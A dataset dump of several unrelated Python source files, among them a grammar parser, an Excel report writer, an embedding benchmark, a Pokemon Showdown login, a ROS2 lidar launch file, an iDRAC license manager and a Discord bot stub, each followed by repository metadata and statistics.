assert isinstance(self.item2, CfgItem)
return self.item2.can_shift(word, index)
def shift_word1(self, word, index):
"""
Shifts onto the CFG item.
"""
assert isinstance(self.item1, CfgItem)
nitem = self.item1.shift(word, index)
self.shifted = (self.item1.shifted, self.item2.shifted)
return SynchronousItem(self.rule, self.item1class, self.item2class, nitem, self.item2, nodelabels = self.nodelabels)
def shift_word2(self, word, index):
"""
Shifts onto the CFG item.
"""
assert isinstance(self.item2, CfgItem)
nitem = self.item2.shift(word, index)
self.shifted = (self.item1.shifted, self.item2.shifted)
return SynchronousItem(self.rule, self.item1class, self.item2class, self.item1, nitem, nodelabels = self.nodelabels)
def can_shift_edge1(self, edge):
"""
Determines whether the given edge can be shifted onto the HERG item.
"""
assert isinstance(self.item1, HergItem)
self.shifted = (self.item1.shifted, self.item2.shifted)
return self.item1.can_shift(edge)
def can_shift_edge2(self, edge):
"""
Determines whether the given edge can be shifted onto the HERG item.
"""
assert isinstance(self.item2, HergItem)
self.shifted = (self.item1.shifted, self.item2.shifted)
return self.item2.can_shift(edge)
def shift_edge1(self, edge):
"""
Shifts onto the HERG item.
"""
nitem = self.item1.shift(edge)
return SynchronousItem(self.rule, self.item1class, self.item2class, nitem, self.item2, nodelabels = self.nodelabels)
def shift_edge2(self, edge):
"""
Shifts onto the HERG item.
"""
nitem = self.item2.shift(edge)
return SynchronousItem(self.rule, self.item1class, self.item2class, self.item1, nitem, nodelabels = self.nodelabels)
def can_complete(self, new_item):
"""
Determines whether given item can complete both sides.
"""
if not (self.item1.can_complete(new_item.item1) and
self.item2.can_complete(new_item.item2)):
return False
return True
def complete(self, new_item):
"""
Performs the synchronous completion, and gives back a new item.
"""
nitem1 = self.item1.complete(new_item.item1)
nitem2 = self.item2.complete(new_item.item2)
return SynchronousItem(self.rule, self.item1class, self.item2class, nitem1, nitem2, nodelabels = self.nodelabels)
| 33.473154 | 125 | 0.646516 | 2,842 | 19,950 | 4.406756 | 0.110486 | 0.05709 | 0.038007 | 0.014372 | 0.49984 | 0.411769 | 0.36434 | 0.314756 | 0.301821 | 0.274752 | 0 | 0.02013 | 0.250476 | 19,950 | 595 | 126 | 33.529412 | 0.817428 | 0.225915 | 0 | 0.453297 | 0 | 0 | 0.010206 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.098901 | false | 0.002747 | 0.008242 | 0.021978 | 0.296703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb2f5ca3954e0ac0cd30c52e249acffaf9cb26a5 | 7,120 | py | Python | inc_cg_reporter/excel_writer.py | edwinsteele/inc-cg-reporter | 7bf63a9a0492b474526f6da54ea39b31a1a8d4fd | [
"MIT"
] | null | null | null | inc_cg_reporter/excel_writer.py | edwinsteele/inc-cg-reporter | 7bf63a9a0492b474526f6da54ea39b31a1a8d4fd | [
"MIT"
] | null | null | null | inc_cg_reporter/excel_writer.py | edwinsteele/inc-cg-reporter | 7bf63a9a0492b474526f6da54ea39b31a1a8d4fd | [
"MIT"
] | null | null | null | import datetime
import pathlib
from tempfile import NamedTemporaryFile
from typing import List, Dict
from backports.zoneinfo import ZoneInfo
from more_itertools import first
from openpyxl import Workbook
from openpyxl.styles import Alignment, Border, Side
from openpyxl.utils import get_column_letter
from openpyxl.worksheet.page import PrintPageSetup
from openpyxl.worksheet.worksheet import Worksheet
from inc_cg_reporter.connect_group import (
ConnectGroup,
ConnectGroupMembershipManager,
Person,
)
from inc_cg_reporter.field_definition import PERSONAL_ATTRIBUTE_NAME
class ConnectGroupWorksheetGenerator:
"""Creates a well formatted worksheet for a Connect Group"""
DATE_TYPE_COLUMN_WIDTH = 15
FIRST_COLUMN_WIDTH = 22
FIRST_ROW_HEIGHT = 2
HEADER_ROW_HEIGHT = 30
THIN_BORDER = Border(
left=Side(border_style="thin"),
right=Side(border_style="thin"),
top=Side(border_style="thin"),
bottom=Side(border_style="thin"),
)
def __init__(self, field_list: List[str]):
# column indexes start from 1 and enumerate uses zero-based counting,
# so we need to bump our column number by one
self._column_locations = {
col_name: col_number + 1 for col_number, col_name in (enumerate(field_list))
}
def person_as_row_values(self, person: Person) -> Dict[int, str]:
row = {}
# XXX this generator shouldn't need to know where to find the personal
# attributes on the person.
for column_name, value in person.personal_attributes.items():
row[self._column_locations[column_name]] = value
return row
def populate(self, ws: Worksheet, cg: ConnectGroup):
ws.title = cg.name
self.create_column_headers(ws)
for person in sorted(
cg.members, key=lambda p: p.personal_attributes[PERSONAL_ATTRIBUTE_NAME]
):
ws.append(self.person_as_row_values(person))
def create_column_headers(self, ws: Worksheet):
ws.cell(row=1, column=1, value="Name")
for col_name, col_index in self._column_locations.items():
ws.cell(row=1, column=col_index, value=col_name)
def insert_heading(self, ws: Worksheet):
# This can only be run after the table has been populated and styled
# given it prepends rows to the sheet. Ugh.
ws.insert_rows(0)
ws["A1"] = ws.title
ws.merge_cells("A1:{}1".format(get_column_letter(ws.max_column)))
# Style merged cells using the top left cell reference
ws["A1"].style = "Headline 1"
# alignment is overwritten by style, so set it afterwards
ws["A1"].alignment = Alignment(horizontal="center", vertical="center")
no_border = Side(border_style=None)
ws["A1"].border = Border(
left=no_border, right=no_border, top=no_border, outline=False
)
def style(self, ws: Worksheet):
# Give columns a fixed width so each sheet can print onto a single
# A4 in landscape mode.
for col_name, col_index in self._column_locations.items():
# column_dimensions requires a column name, not an index
ws.column_dimensions[
get_column_letter(col_index)
].width = self.DATE_TYPE_COLUMN_WIDTH
# Then override the first column width (it's like a header)
ws.column_dimensions["A"].width = self.FIRST_COLUMN_WIDTH
# Style the first column in a header-like way
for cell in first(ws.columns):
cell.style = "40 % - Accent1"
# Style header row (note the overlap with the name column... we're
# intentionally overwriting the style of A1 to be what is below)
for cell in first(ws.rows):
cell.style = "Accent1"
cell.alignment = Alignment(wrap_text=True, horizontal="center")
# Intended to be double height, with text wrap set in the loop below
ws.row_dimensions[1].height = self.HEADER_ROW_HEIGHT
# Style the data cells (non-header cells)
for row in ws.iter_rows(min_row=2, min_col=2):
for cell in row:
cell.alignment = Alignment(horizontal="center")
cell.border = self.THIN_BORDER
def setup_print_page_setup(self, ws):
# fitToWidth isn't recognised on numbers. Hardcoding a scale is ghastly,
# but it works and will update if it's inappropriate
ws.page_setup = PrintPageSetup(orientation="landscape", scale=75)
class ConnectGroupWorkbookManager:
"""An excel workbook, with sheets per connect group and a summary sheet"""
OUTPUT_FILENAME = "inc_cg.xlsx"
def __init__(
self,
membership_manager: ConnectGroupMembershipManager,
worksheet_generator: ConnectGroupWorksheetGenerator,
):
self._membership_manager = membership_manager
self._worksheet_generator = worksheet_generator
self._workbook = Workbook()
def insert_title_sheet(self) -> None:
about_sheet = self._workbook.create_sheet("About", 0)
about_sheet.title = "About"
about_sheet.column_dimensions["A"].width = 20
about_sheet.column_dimensions["B"].width = 40
now_au = datetime.datetime.now(tz=ZoneInfo("Australia/Sydney"))
about_sheet.append({"A": "Created:", "B": now_au.ctime()})
about_sheet.append(
{
"A": "Connect Group Count:",
"B": self._membership_manager.connect_groups_count,
}
)
about_sheet.append(
{
"A": "Connect Group Total Member Count:",
"B": self._membership_manager.connect_groups_member_count,
}
)
# Show a list of ConnectGroups
if self._membership_manager.connect_groups_member_count > 0:
about_sheet.append(
{"A": "Connect Group List:", "B": self._workbook.worksheets[1].title}
)
# Ignore the zeroth worksheet (this about page), and the first worksheet
# that we printed in the line about
for ws in self._workbook.worksheets[2:]:
about_sheet.append({"B": ws.title})
def create(self) -> None:
for connect_group in sorted(
self._membership_manager.connect_groups.values(), key=lambda x: x.name
):
ws = self._workbook.create_sheet()
self._worksheet_generator.populate(ws, connect_group)
self._worksheet_generator.style(ws)
self._worksheet_generator.insert_heading(ws)
self._worksheet_generator.setup_print_page_setup(ws)
# Remove the blank sheet that's created initially
self._workbook.remove(self._workbook.worksheets[0])
self.insert_title_sheet()
def save(self) -> pathlib.Path:
output_file = NamedTemporaryFile(delete=False)
self._workbook.save(output_file.name)
output_file.close()
output_path = pathlib.Path(output_file.name)
return output_path.rename(output_path.with_name(self.OUTPUT_FILENAME))
| 39.776536 | 88 | 0.658287 | 901 | 7,120 | 5.00222 | 0.283019 | 0.019969 | 0.027957 | 0.016863 | 0.090748 | 0.069004 | 0.0497 | 0.019525 | 0.019525 | 0.019525 | 0 | 0.00754 | 0.254916 | 7,120 | 178 | 89 | 40 | 0.842036 | 0.188062 | 0 | 0.0625 | 0 | 0 | 0.039492 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085938 | false | 0 | 0.101563 | 0 | 0.265625 | 0.015625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb30048a187fc956b10e024a3231a64c928e715b | 1,969 | py | Python | position.py | wenwen0319/HIT_test | feba0c7dac4074ca3e602e499d3d946a6abce995 | [
"MIT"
] | null | null | null | position.py | wenwen0319/HIT_test | feba0c7dac4074ca3e602e499d3d946a6abce995 | [
"MIT"
] | null | null | null | position.py | wenwen0319/HIT_test | feba0c7dac4074ca3e602e499d3d946a6abce995 | [
"MIT"
] | null | null | null | # from numba import jit
import numpy as np
import logging
numba_logger = logging.getLogger('numba')
numba_logger.setLevel(logging.WARNING)
# @jit(nopython=True)
def nodets2key(batch: int, node: int, ts: float):
key = '-'.join([str(batch), str(node), float2str(ts)])
return key
# @jit(nopython=True)
def float2str(ts):
return str(int(round(ts)))
def make_batched_keys(node_record, t_record):
batch = node_record.shape[0]
support = node_record.shape[1]
batched_keys = make_batched_keys_l(node_record, t_record, batch, support)
batched_keys = np.array(batched_keys).reshape((batch, support))
# batched_keys = np.array([nodets2key(b, n, t) for b, n, t in zip(batch_matrix.ravel(), node_record.ravel(), t_record.ravel())]).reshape(batch, support)
return batched_keys
# @jit(nopython=True)
def make_batched_keys_l(node_record, t_record, batch, support):
batch_matrix = np.arange(batch).repeat(support).reshape((-1, support))
# batch_matrix = np.tile(np.expand_dims(np.arange(batch), 1), (1, support))
batched_keys = []
for i in range(batch):
for j in range(support):
b = batch_matrix[i, j]
n = node_record[i, j]
t = t_record[i, j]
batched_keys.append(nodets2key(b, n, t))
return batched_keys
# @jit(nopython=True)
def anonymize(node_records, batch, M, walk_len):
new_node_records = np.zeros_like(node_records)
for i in range(batch):
for j in range(M):
seen_nodes = []
for w in range(walk_len):
index = list_index(seen_nodes, node_records[i, j, w])
if index == len(seen_nodes):
seen_nodes.append(node_records[i, j, w])
new_node_records[i, j, w] = index
return new_node_records
# @jit(nopython=True)
def list_index(arr, item):
count = 0
for e in arr:
if e == item:
return count
count += 1
return count | 31.253968 | 156 | 0.638395 | 288 | 1,969 | 4.177083 | 0.253472 | 0.100582 | 0.062344 | 0.074813 | 0.270989 | 0.217789 | 0.177889 | 0.119701 | 0.119701 | 0.074813 | 0 | 0.007963 | 0.234637 | 1,969 | 63 | 157 | 31.253968 | 0.790312 | 0.175724 | 0 | 0.139535 | 0 | 0 | 0.003715 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.046512 | 0.023256 | 0.348837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb3190ae66c1e67dd51acbaf941efef659b043cd | 3,495 | py | Python | train/compute/python/examples/pytorch/run_op_split_table_batched_embeddings.py | caogao/param | 9de2602c894df264a004c352ee16abc14f93da76 | [
"MIT"
] | 34 | 2020-10-07T23:55:19.000Z | 2022-03-15T03:18:23.000Z | train/compute/python/examples/pytorch/run_op_split_table_batched_embeddings.py | caogao/param | 9de2602c894df264a004c352ee16abc14f93da76 | [
"MIT"
] | 33 | 2020-10-09T23:57:45.000Z | 2022-03-24T08:15:35.000Z | train/compute/python/examples/pytorch/run_op_split_table_batched_embeddings.py | caogao/param | 9de2602c894df264a004c352ee16abc14f93da76 | [
"MIT"
] | 16 | 2020-10-08T12:43:08.000Z | 2022-03-04T17:09:15.000Z | import torch
from fbgemm_gpu.split_table_batched_embeddings_ops import PoolingMode
from ...lib import pytorch as lib_pytorch
from ...lib.config import make_op_config
from ...lib.init_helper import load_modules
from ...lib.pytorch.config_util import (
ExecutionPass,
create_op_args,
create_op_info,
get_benchmark_options,
)
from ...lib.pytorch.op_executor import OpExecutor
from ...workloads import pytorch as workloads_pytorch
def main():
# Load PyTorch implementations for data generator and operators.
load_modules(lib_pytorch)
# Load PyTorch operator workloads.
load_modules(workloads_pytorch)
# Important to set num of threads to 1, some ops are not thread safe and
# also improves measurement stability.
torch.set_num_threads(1)
op_name = "SplitTableBatchedEmbeddingBagsCodegen"
op_info = create_op_info()
op_info[
"input_data_generator"
] = "SplitTableBatchedEmbeddingBagsCodegenInputDataGenerator"
print(op_info)
# Get the default benchmark options.
run_options = get_benchmark_options()
# Create OperatorConfig that initializes the actual operator workload and
# various generators to create inputs for the operator.
op_config = make_op_config(op_name, op_info, run_options["device"])
# By default, benchmark will run the forward pass.
# By setting backward (which requires running forward pass), the benchmark
# will run both forward and backward pass.
run_options["pass_type"] = ExecutionPass.BACKWARD
# Define config parameters required for input data generation and operator building.
num_tables = 1
rows = 228582
dim = 128
batch_size = 512
pooling_factor = 50
weighted = True
weights_precision = "fp16"
optimizer = "exact_row_wise_adagrad"
# Construct configuration for input data generator.
data_generator_config = create_op_args(
[
{"type": "int", "name": "num_tables", "value": num_tables},
{"type": "int", "name": "rows", "value": rows},
{"type": "int", "name": "dim", "value": dim},
{"type": "int", "name": "batch_size", "value": batch_size},
{"name": "pooling_factor", "type": "int", "value": pooling_factor},
{"type": "bool", "name": "weighted", "value": weighted},
{"type": "str", "name": "weights_precision", "value": weights_precision},
],
{"optimizer": {"type": "str", "value": optimizer}},
)
# Generate the actual data for inputs.
input_data_gen = op_config.input_data_generator()
(input_args, input_kwargs) = input_data_gen.get_data(
data_generator_config, run_options["device"]
)
# Construct and initialize the SplitTableBatchedEmbeddingBagsCodegen operator.
op_config.op.build(
num_tables,
rows,
dim,
PoolingMode.SUM,
weighted,
weights_precision,
optimizer,
)
# Create an OpExecutor to run the actual workload.
op_exe = OpExecutor(op_name, op_config.op, run_options)
# Run and collect the result metrics.
result = op_exe.run(input_args, input_kwargs, "0:0:0")
# Loop through and print the metrics.
print("### Benchmark Results ###")
for pass_name, pass_data in result.items():
print(f"pass: {pass_name}")
for metric_name, metrics in pass_data.items():
print(metric_name)
print(metrics)
if __name__ == "__main__":
main()
| 32.971698 | 88 | 0.67382 | 420 | 3,495 | 5.369048 | 0.32619 | 0.021286 | 0.019512 | 0.017738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008124 | 0.225179 | 3,495 | 105 | 89 | 33.285714 | 0.824594 | 0.25608 | 0 | 0 | 0 | 0 | 0.160341 | 0.044152 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014493 | false | 0.072464 | 0.115942 | 0 | 0.130435 | 0.072464 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb31ec1a332dbdfa82d99d7fc7a29ce3ab110102 | 982 | py | Python | src/login.py | kushalnaidu/showdown-battle-bot | 00c2d4f0172fd7a545a1bcbc1c2b21283314151b | [
"MIT"
] | 22 | 2018-01-31T12:30:29.000Z | 2021-12-22T01:12:15.000Z | src/login.py | kushalnaidu/showdown-battle-bot | 00c2d4f0172fd7a545a1bcbc1c2b21283314151b | [
"MIT"
] | 4 | 2018-09-04T14:48:46.000Z | 2022-03-09T20:09:28.000Z | src/login.py | kushalnaidu/showdown-battle-bot | 00c2d4f0172fd7a545a1bcbc1c2b21283314151b | [
"MIT"
] | 16 | 2018-08-23T19:30:53.000Z | 2021-12-08T06:18:16.000Z | import sys
import json
import requests
from src.senders import sender
async def log_in(websocket, challid, chall):
"""
Login in function. Send post request to showdown server.
:param websocket: Websocket stream
:param challid: first part of login challstr sent by server
:param chall: second part of login challstr sent by server
"""
with open(sys.path[0] + "/src/id.txt") as logfile:
username = logfile.readline()[:-1]
password = logfile.readline()[:-1]
resp = requests.post("https://play.pokemonshowdown.com/action.php?",
data={
'act': 'login',
'name': username,
'pass': password,
'challstr': challid + "%7C" + chall
})
await sender(websocket, "", "/trn " + username + ",0," + json.loads(resp.text[1:])['assertion'])
await sender(websocket, "", "/avatar 159")
| 37.769231 | 100 | 0.552953 | 106 | 982 | 5.113208 | 0.59434 | 0.04059 | 0.04059 | 0.070111 | 0.114391 | 0.114391 | 0.114391 | 0 | 0 | 0 | 0 | 0.013493 | 0.320774 | 982 | 25 | 101 | 39.28 | 0.7991 | 0 | 0 | 0 | 0 | 0 | 0.147849 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 1 | 0 | false | 0.117647 | 0.235294 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb33404ce71f2b88413dcd54b52425bf86472df8 | 561 | py | Python | launch/sick_ldmrs.launch.py | Kaju-Bubanja/sick_scan2 | 9a518b8e88d8515e25168b1860e7bee3af79f1da | [
"Apache-2.0"
] | null | null | null | launch/sick_ldmrs.launch.py | Kaju-Bubanja/sick_scan2 | 9a518b8e88d8515e25168b1860e7bee3af79f1da | [
"Apache-2.0"
] | null | null | null | launch/sick_ldmrs.launch.py | Kaju-Bubanja/sick_scan2 | 9a518b8e88d8515e25168b1860e7bee3af79f1da | [
"Apache-2.0"
] | null | null | null | import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
ld = LaunchDescription()
config = os.path.join(
get_package_share_directory('sick_scan2'),
'config',
'sick_ldmrs.yaml'
)
node = Node(
package='sick_scan2',
name='sick_scan2',
executable='sick_generic_caller',
output='screen',
parameters=[config]
)
ld.add_action(node)
return ld
| 25.5 | 67 | 0.672014 | 64 | 561 | 5.609375 | 0.578125 | 0.075209 | 0.083565 | 0.133705 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007042 | 0.240642 | 561 | 21 | 68 | 26.714286 | 0.835681 | 0 | 0 | 0 | 1 | 0 | 0.135472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.2 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb34d4e88ec1cd6671f5adf6f293a9c837cc85a0 | 9,244 | py | Python | omdrivers/lifecycle/iDRAC/iDRACLicense.py | DanielFroehlich/omsdk | 475d925e4033104957fdc64480fe8f9af0ab6b8a | [
"Apache-2.0"
] | 61 | 2018-02-21T00:02:20.000Z | 2022-01-26T03:47:19.000Z | omdrivers/lifecycle/iDRAC/iDRACLicense.py | DanielFroehlich/omsdk | 475d925e4033104957fdc64480fe8f9af0ab6b8a | [
"Apache-2.0"
] | 31 | 2018-03-24T05:43:39.000Z | 2022-03-16T07:10:37.000Z | omdrivers/lifecycle/iDRAC/iDRACLicense.py | DanielFroehlich/omsdk | 475d925e4033104957fdc64480fe8f9af0ab6b8a | [
"Apache-2.0"
] | 25 | 2018-03-13T10:06:12.000Z | 2022-01-26T03:47:21.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Copyright © 2018 Dell Inc. or its subsidiaries. All rights reserved.
# Dell, EMC, and other trademarks are trademarks of Dell Inc. or its subsidiaries.
# Other trademarks may be trademarks of their respective owners.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Vaideeswaran Ganesan
#
import os
import re
import time
import xml.etree.ElementTree as ET
from enum import Enum
from datetime import datetime
from omsdk.sdkprint import PrettyPrint
from omsdk.sdkcenum import EnumWrapper, TypeHelper
from omsdk.lifecycle.sdklicenseapi import iBaseLicenseApi
from omdrivers.lifecycle.iDRAC.iDRACConfig import LicenseApiOptionsEnum
import base64
import sys
import logging
logger = logging.getLogger(__name__)
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
try:
from pysnmp.hlapi import *
from pysnmp.smi import *
PySnmpPresent = True
except ImportError:
PySnmpPresent = False
from omdrivers.enums.iDRAC.iDRACEnums import *
class iDRACLicense(iBaseLicenseApi):
def __init__(self, entity):
if PY2:
super(iDRACLicense, self).__init__(entity)
else:
super().__init__(entity)
self._job_mgr = entity.job_mgr
self._config_mgr = entity.config_mgr
self._license_fqdds = []
def _get_license_json(self):
if not hasattr(self, 'license') or "License" not in self.license:
self.license = {}
self.entity._get_entries(self.license, iDRACLicenseEnum)
if "LicensableDevice" in self.license:
entries = self.license["LicensableDevice"]
if isinstance(entries, dict):
entries = [entries]
for entry in entries:
self._license_fqdds.append(entry["FQDD"])
return self.license
def _get_license_text(self, entitlementId):
retVal = self.entity._export_license(id=entitlementId)
ltext = self.entity._get_field_from_action(retVal,
"Data", "ExportLicense_OUTPUT", "LicenseFile")
if ltext:
retVal['License'] = base64.b64decode(ltext).decode("utf-8")
return retVal
def _save_license_text(self, entitlementId, folder):
retVal = self._get_license_text(entitlementId)
with open(os.path.join(folder, entitlementId), "wb") as output:
output.write(retVal['License'].encode('UTF-8'))
output.flush()
return os.path.join(folder, entitlementId)
def export_license(self, folder):
expLic = []
if not os.path.exists(folder):
os.makedirs(folder)
elif not os.path.isdir(folder):
# replace with exception
return []
self._get_license_json()
if not "License" in self.license:
# replace with exception
return []
llist = self.license["License"]
if isinstance(self.license["License"], dict):
llist = [llist]
for i in llist:
entitlementId = i["EntitlementID"]
expLic.append(self._save_license_text(entitlementId, folder))
return expLic
def export_license_share(self, license_share_path):
self._get_license_json()
if not "License" in self.license:
return {"l": False}
llist = self.license["License"]
if isinstance(self.license["License"], dict):
llist = [llist]
retval = {'Status': 'Success', 'Exported': 0, 'Failed to Export': 0}
for i in llist:
entitlementId = i["EntitlementID"]
rjson = self.entity._export_license_share(share=license_share_path,
creds=license_share_path.creds, id=entitlementId)
rjson = self._job_mgr._job_wait(rjson['Message'], rjson)
if rjson['Status'] == 'Success':
retval['Exported'] += 1
else:
retval['Failed to Export'] += 1
if retval['Exported'] == 0 and retval['Failed to Export'] > 0:
retval['Status'] = 'Failed'
return retval
def _import_license_fqdd(self, license_file, fqdd="iDRAC.Embedded.1", options=LicenseApiOptionsEnum.NoOptions):
if not os.path.exists(license_file) or not os.path.isfile(license_file):
logger.debug(license_file + " is not a file!")
return False
content = ''
with open(license_file, 'rb') as f:
content = f.read()
content = bytearray(base64.b64encode(content))
for i in range(0, len(content) + 65, 65):
content[i:i] = '\n'.encode()
return self.entity._import_license(fqdd=fqdd,
options=options, file=content.decode())
def _import_license_share_fqdd(self, license_share_path, fqdd="iDRAC.Embedded.1",
options=LicenseApiOptionsEnum.NoOptions):
self._get_license_json()
if not "License" in self.license:
return False
llist = self.license["License"]
if isinstance(self.license["License"], dict):
llist = [llist]
retval = {'Status': 'Success', 'Imported': 0, 'Failed to Import': 0}
for i in llist:
entitlementId = i["EntitlementID"]
rjson = self.entity._import_license_share(share=license_share_path,
creds=license_share_path.creds, name="Import",
fqdd=fqdd, options=options)
rjson = self._job_mgr._job_wait(rjson['Message'], rjson)
logger.debug(rjson)
if rjson['Status'] == 'Success':
retval['Imported'] += 1
else:
retval['Failed to Import'] += 1
if retval['Imported'] == 0 and retval['Failed to Import'] > 0:
retval['Status'] = 'Failed'
return retval
def _replace_license_fqdd(self, license_file, entitlementId, fqdd="iDRAC.Embedded.1",
options=LicenseApiOptionsEnum.NoOptions):
if not os.path.exists(license_file) or not os.path.isfile(license_file):
logger.debug(license_file + " is not a file!")
return False
content = ''
with open(license_file) as f:
content = f.read()
return self.entity._replace_license(id=entitlementId,
fqdd=fqdd, options=options, file=content)
def _delete_license_fqdd(self, entitlementId, fqdd="iDRAC.Embedded.1", options=LicenseApiOptionsEnum.NoOptions):
return self.entity._delete_license(id=entitlementId,
fqdd=fqdd, options=options)
@property
def LicensableDeviceFQDDs(self):
self._get_license_json()
return self._license_fqdds
@property
def LicensableDevices(self):
self._get_license_json()
return list(self._config_mgr._fqdd_to_comp(self._license_fqdds))
@property
def Licenses(self):
self._get_license_json()
return self.license["License"]
def import_license(self, license_file, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._import_license_fqdd(license_file, fqdd=fqddlist[0], options=options)
def import_license_share(self, license_share_path, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._import_license_share_fqdd(license_share_path, fqdd=fqddlist[0], options=options)
def replace_license(self, license_file, entitlementId, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._replace_license_fqdd(license_file, entitlementId, fqdd=fqddlist[0], options=options)
def delete_license(self, entitlementId, component="iDRAC", options=LicenseApiOptionsEnum.NoOptions):
fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])
return self._delete_license_fqdd(entitlementId, fqdd=fqddlist[0], options=options)
| 42.599078 | 120 | 0.623107 | 1,018 | 9,244 | 5.479371 | 0.220039 | 0.055217 | 0.022947 | 0.019362 | 0.491215 | 0.433489 | 0.373252 | 0.328612 | 0.300108 | 0.286124 | 0 | 0.008122 | 0.280723 | 9,244 | 216 | 121 | 42.796296 | 0.830651 | 0.092276 | 0 | 0.359756 | 0 | 0 | 0.071034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103659 | false | 0 | 0.182927 | 0.006098 | 0.426829 | 0.006098 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb365dc3b0f658d8f759aeb22816bea5884e02ae | 223 | py | Python | inference/preprocessors/dummy.py | narumiruna/inference-template | 4946f4de632c49a8b65b484a4eb77979da8d8208 | [
"MIT"
] | null | null | null | inference/preprocessors/dummy.py | narumiruna/inference-template | 4946f4de632c49a8b65b484a4eb77979da8d8208 | [
"MIT"
] | null | null | null | inference/preprocessors/dummy.py | narumiruna/inference-template | 4946f4de632c49a8b65b484a4eb77979da8d8208 | [
"MIT"
] | null | null | null | from ..utils import get_logger
from .preprocessors import Preprocessor
LOGGER = get_logger(__name__)
class DummyPreprocessor(Preprocessor):
def __call__(self, frame):
LOGGER.info('Call dummy pre-processor')
| 20.272727 | 47 | 0.757848 | 26 | 223 | 6.115385 | 0.692308 | 0.113208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156951 | 223 | 10 | 48 | 22.3 | 0.845745 | 0 | 0 | 0 | 0 | 0 | 0.107623 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
bb36ec70c07ffa6bf2c091910c913a445feb66eb | 266 | py | Python | main.py | MustafaTheCoder/Basic-Discord-Bot | 7dcbd3f9746a1e1bbef45c34903cff0e23899411 | [
"MIT"
] | null | null | null | main.py | MustafaTheCoder/Basic-Discord-Bot | 7dcbd3f9746a1e1bbef45c34903cff0e23899411 | [
"MIT"
] | null | null | null | main.py | MustafaTheCoder/Basic-Discord-Bot | 7dcbd3f9746a1e1bbef45c34903cff0e23899411 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
client = commands.Bot(command_prefix="-")
@client.event
async def on_ready():
print("Bot is ready!")
